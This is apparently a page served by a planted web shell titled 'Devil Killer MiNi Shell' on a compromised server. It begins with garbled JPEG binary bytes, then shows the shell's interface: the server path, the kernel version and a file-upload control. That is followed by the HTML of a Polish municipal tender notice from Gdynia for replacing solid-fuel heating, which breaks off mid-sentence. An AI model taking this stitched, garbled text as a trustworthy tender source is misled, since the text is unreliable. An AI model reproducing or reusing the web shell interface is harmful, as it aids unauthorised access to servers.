JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230425/0019166201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zmiana sposobu ogrzewania w gminnych budynkach i lokalach poprzez likwidację pieców na paliwo stałe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD BUDYNKÓW I LOKALI KOMUNALNYCH W GDYNI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 360995521</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Hugo Kołłątaja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-332</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">586284112</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zbilk.gdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zbilk.gdynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administrowanie obiektami komunalnymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zmiana sposobu ogrzewania w gminnych budynkach i lokalach poprzez likwidację pieców na paliwo stałe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82354c97-e33b-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00191662</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001579/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Zmiana sposobu ogrzewania w gminnych budynkach i lokalach poprzez likwidację pieców na paliwo stałe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zbilkgdynia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez System SmartPZP. System jest dostępny pod adresem Zamawiającego: https://portal.smartpzp.pl/zbilkgdynia/ Za pośrednictwem posiadanego w Systemie konta Jednostki Zamawiającej oraz kont Użytkowników Wewnętrznych Jednostki Zamawiającej odbywa się komunikacja Zamawiającego z Wykonawcą w postępowaniu, w szczególności takie czynności jak: przekazywanie wezwań i zawiadomień, informacji, odpowiedzi na pytania dotyczące postępowania. Do pełnego i prawidłowego korzystania z Systemu przez Użytkowników Zewnętrznych konieczne jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Systemu możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają użytkownicy Wykonawcy następujących minimalnych wymagań technicznych i specyfiki połączenia:<br/>a) w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów:<br/>- Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - Lub ich nowsze wersje<br/>- przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera w ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>- Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera, przy czym zalecane jest używanie najnowszych wersji przeglądarek<br/>b) w zakresie składania podpisu kwalifikowanego (za pośrednictwem platformy SmartPZP):<br/>- zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>- w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web<br/>- oprogramowania SzafirHost systemie operacyjnym.<br/>Instrukcja instalowania oprogramowania wskazanego w lit. b) znajduje się w Systemie (w zakładce E-learning).<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców. Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej zapewnionych w Systemie jest uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług Systemu na witrynie internetowej przy zakładaniu profilu Wykonawcy. <br/>3. Korzystanie z Systemu przez Wykonawców jest bezpłatne.<br/>4. Użytkownikom Zewnętrznym Wykonawcy przysługuje prawo korzystania z asysty obejmującej wsparcie techniczne w kwestiach dotyczących korzystania z Systemu, polegające na doradztwie telefonicznym i e-mailowym na zasadach określonych w Regulaminie korzystania z usług Systemu.<br/>5. Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>6. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanym dalej „RODO”, Zamawiający informuje, że: <br/>1. administratorem danych osobowych Wykonawcy jest Zarząd Budynków i Lokali Komunalnych w Gdyni jednostka budżetowa, <br/>2. kontakt do inspektora ochrony danych osobowych w Zarządzie Budynków i Lokali Komunalnych w Gdyni: iod@zbilk.gdynia.pl, <br/>3. Dane osobowe Wykonawcy przetwarzane będą na podstawie: <br/>1) art. 6 ust. 1 lit c RODO w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129 ze zm.) w celu przeprowadzenia i rozstrzygnięcia postępowania o udzielenie zamówienia publicznego, <br/>2) art. 6 ust. 1 lit. b RODO w celu zawarcia z wybranym Wykonawcą umowy w sprawie zamówienia publicznego i wykonania tej umowy. <br/>4. odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art 18, art. 74 z ograniczeniami wynikającymi z art. 18 ust 5 i ust.6 ustawy Pzp lub na podstawie ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej oraz partnerzy świadczący usługi techniczne, firmy archiwizujące dokumenty, operator pocztowy; <br/>5. dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 oraz ust. 4 Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6. obowiązek podania przez Wykonawcę danych osobowych bezpośrednio Wykonawcę dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp, <br/>7. w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO, <br/>8. Wykonawca posiada 1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Wykonawcy dotyczących, <br/>2) na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy <br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, <br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO, <br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, <br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zmawiający zgodnie z art. 19 ustawy PZP informuje, że:<br/>1) skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>2) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZBILK.IZ.PH.241.P.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Do wykonania są następujące roboty budowlane:<br/>- likwidacja istniejących źródeł ciepła i ciepłej wody użytkowej,<br/>- wykonanie wewnętrznej instalacji gazowej do dwufunkcyjnego kotła gazowego oraz kuchenki gazowej wraz z zakupem i montażem,<br/>- wykonanie instalacji ogrzewania i ciepłej wody użytkowej.<br/>Prace należy wykonać w lokalach znajdujących się przy następujących adresach:<br/>- Gdynia ul. Ujejskiego 25/3<br/>- Gdynia ul. Sandomierska 1 B/10<br/>- Gdynia ul. Tucholska 1/9<br/>- Gdynia ul. Kopernika 6/4<br/>- Gdynia ul. Żeromskiego 10/1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45314310-7 - Układanie kabli</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena: maksymalną ilość punktów w danym kryterium otrzyma oferta Wykonawcy, który zaoferuje najniższą cenę ofertową;<br/>2) termin realizacji: ocenie będzie podlegać deklarowana długość terminu realizacji przedmiotu zamówienia zgodnie z poniższymi zasadami:<br/>a) maksymalną ilość punktów otrzyma oferta Wykonawcy, który zaoferuje najkrótszy możliwy termin realizacji przedmiotu zamówienia (40 dni kalendarzowych od dnia podpisania umowy),<br/>b) maksymalny możliwy termin realizacji przedmiotu zamówienia wynosi 60 dni kalendarzowych od dnia podpisania umowy,<br/>c) jeżeli Wykonawca nie określi w formularzu ofertowym terminu realizacji Zamawiający przyjmie, że wynosi on 60 dni kalendarzowych od dnia podpisania umowy,<br/>d) jeżeli Wykonawca określi okres dłuższy niż maksymalny możliwy termin realizacji lub okres krótszy niż minimalny możliwy termin realizacji oferta Wykonawcy zostanie odrzucona.<br/>e) jeżeli Wykonawca zaznaczy w formularzu ofertowym więcej niż jeden z możliwych do wyboru terminów realizacji, Zamawiający uzna, za wiążący dłuższy termin realizacji.<br/>3) okres gwarancji: ocenie będzie podlegać deklarowana długość terminu gwarancji podana w miesiącach zgodnie z poniższymi zasadami: <br/>a) maksymalną ilość punktów otrzyma oferta Wykonawcy, który zaoferuje najdłuższy możliwy okres gwarancji tj. 60 miesięcy,<br/>b) minimalny możliwy okres gwarancji wynosi 36 miesięcy,<br/>c) jeżeli Wykonawca nie wskaże w formularzu ofertowym deklarowanego okresu gwarancji Zamawiający uzna, że wynosi on 36 miesięcy,<br/>d) jeżeli Wykonawca wskaże okres dłuższy niż maksymalny możliwy okres gwarancji lub okres krótszy niż minimalny możliwy okres gwarancji oferta Wykonawcy zostanie odrzucona.<br/>e) jeżeli Wykonawca zaznaczy w formularzu ofertowym więcej niż jeden z możliwych do wyboru okresów gwarancji, Zamawiający uzna, za wiążący krótszy okres gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Do wykonania są następujące roboty budowlane:<br/>- likwidacja istniejących źródeł ciepła i ciepłej wody użytkowej,<br/>- wykonanie wewnętrznej instalacji gazowej do dwufunkcyjnego kotła gazowego oraz kuchenki gazowej wraz z zakupem i montażem kotła (nie dotyczy lokalu Pucka 100 A/5)<br/>- wykonanie wewnętrznej instalacji elektrycznej do dwufunkcyjnego kotła elektrycznego wraz z zasobnikiem oraz kuchenki gazowej oraz elementami sterującymi wraz z zakupem i montażem kotła z zasobnikiem (dotyczy lokalu Pucka 100 A/5)<br/>- wykonanie instalacji ogrzewania i ciepłej wody użytkowej.<br/>Prace należy wykonać w lokalach znajdujących się przy następujących adresach:<br/>- Gdynia ul. Pucka 100/1<br/>- Gdynia ul. Pucka 100/2<br/>- Gdynia ul. Pucka 100/3<br/>- Gdynia ul. Pucka 100/5<br/>- Gdynia ul. Pucka 100 A/1<br/>- Gdynia ul. Pucka 100 A/2<br/>- Gdynia ul. Pucka 100 A/3<br/>- Gdynia ul. Pucka 100 A/4<br/>- Gdynia ul. Pucka 100 A/5 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45314310-7 - Układanie kabli</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena: maksymalną ilość punktów w danym kryterium otrzyma oferta Wykonawcy, który zaoferuje najniższą cenę ofertową;<br/>2) termin realizacji: ocenie będzie podlegać deklarowana długość terminu realizacji przedmiotu zamówienia zgodnie z poniższymi zasadami:<br/>a) maksymalną ilość punktów otrzyma oferta Wykonawcy, który zaoferuje najkrótszy możliwy termin realizacji przedmiotu zamówienia (40 dni kalendarzowych od dnia podpisania umowy),<br/>b) maksymalny możliwy termin realizacji przedmiotu zamówienia wynosi 60 dni kalendarzowych od dnia podpisania umowy,<br/>c) jeżeli Wykonawca nie określi w formularzu ofertowym terminu realizacji Zamawiający przyjmie, że wynosi on 60 dni kalendarzowych od dnia podpisania umowy,<br/>d) jeżeli Wykonawca określi okres dłuższy niż maksymalny możliwy termin realizacji lub okres krótszy niż minimalny możliwy termin realizacji oferta Wykonawcy zostanie odrzucona.<br/>e) jeżeli Wykonawca zaznaczy w formularzu ofertowym więcej niż jeden z możliwych do wyboru terminów realizacji, Zamawiający uzna, za wiążący dłuższy termin realizacji.<br/>3) okres gwarancji: ocenie będzie podlegać deklarowana długość terminu gwarancji podana w miesiącach zgodnie z poniższymi zasadami: <br/>a) maksymalną ilość punktów otrzyma oferta Wykonawcy, który zaoferuje najdłuższy możliwy okres gwarancji tj. 60 miesięcy,<br/>b) minimalny możliwy okres gwarancji wynosi 36 miesięcy,<br/>c) jeżeli Wykonawca nie wskaże w formularzu ofertowym deklarowanego okresu gwarancji Zamawiający uzna, że wynosi on 36 miesięcy,<br/>d) jeżeli Wykonawca wskaże okres dłuższy niż maksymalny możliwy okres gwarancji lub okres krótszy niż minimalny możliwy okres gwarancji oferta Wykonawcy zostanie odrzucona.<br/>e) jeżeli Wykonawca zaznaczy w formularzu ofertowym więcej niż jeden z możliwych do wyboru okresów gwarancji, Zamawiający uzna, za wiążący krótszy okres gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria 